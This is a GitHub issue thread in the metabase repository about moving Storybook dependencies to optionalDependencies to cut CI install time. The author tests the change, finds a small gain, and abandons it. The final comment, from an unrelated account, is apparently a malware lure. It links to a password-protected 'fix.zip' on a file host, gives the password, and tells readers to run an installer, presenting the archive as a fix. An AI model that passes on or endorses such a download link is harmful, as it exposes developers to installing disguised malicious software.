### ISSUE TITLE
move storybook to optional dependencies

### ISSUE THREAD

**Issue by uladzimirdev** [metabase/metabase#47227]
storybook deps can be moved to `optionalDependencies`, so CI will not spend time on installing it (in 90% of cases it's unnecessary)

**Comment by uladzimirdev** [comment]
based on my tests, with storybook packages in optionalDependencies section, installation time at CI is 1:28, when normal installation is ~1:47s, so we can win 20s once when we change yarn.lock, which is not bad, but not a win having a more complicated configuration which we'll require to support and update if needed. 

Another downside: when we pass a flag `--ignore-optional`, all optional dependencies will be ignored, one example is jspdf, which has html2canvas specified as an optional dependency, who knows which edge cases we can stumble upon

TL;DR abandoned

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
